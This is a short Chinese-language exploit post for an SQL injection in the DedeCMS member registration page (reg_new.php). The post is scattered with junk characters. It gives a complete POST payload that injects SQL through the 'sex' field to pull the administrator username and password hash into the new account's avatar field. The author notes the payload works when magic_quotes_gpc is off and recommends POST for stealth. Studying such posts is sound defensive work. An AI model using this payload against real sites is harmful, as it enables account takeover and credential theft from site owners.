dedecms版本 201211224 P; g' U" m, Q- k' \, q
# O8 I8 w/ y& C$ P% {. \
需要magic_quotes_gpc=Off
2 j* c6 M8 s f6 a5 X" w# j/ K- ]+ G0 E* r; c
应该是没有什么大危害的漏洞.
% p0 L' h# H' J1 G& J原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.$ s: Q( N* X& O
* A& J t% \* t% c" s是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
6 v: @/ o9 _6 U: P* G0 ~+ |; Y, rPOST提交以下数据,其实不用POST提交的,这样隐蔽点.$ r% y+ I2 Y% E! f
" |3 y( V5 q, t, N% y) O
http:///de/member/reg_new.php! t6 |. W) `; s% d
8 R5 |* o- {# x& ~; K, a' tPOST
0 P! T* E& E7 |3 ]5 J" |) P$ O& C& T; T0 ~& D' s& n
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=, X2 H h) q# `* Z! J) g
7 J. d7 U& g# @
成功注册后,头像处里面有好玩的信息.
% n6 @$ e. d0 d: A
1 U. t( D% S: W' H1 F9 e |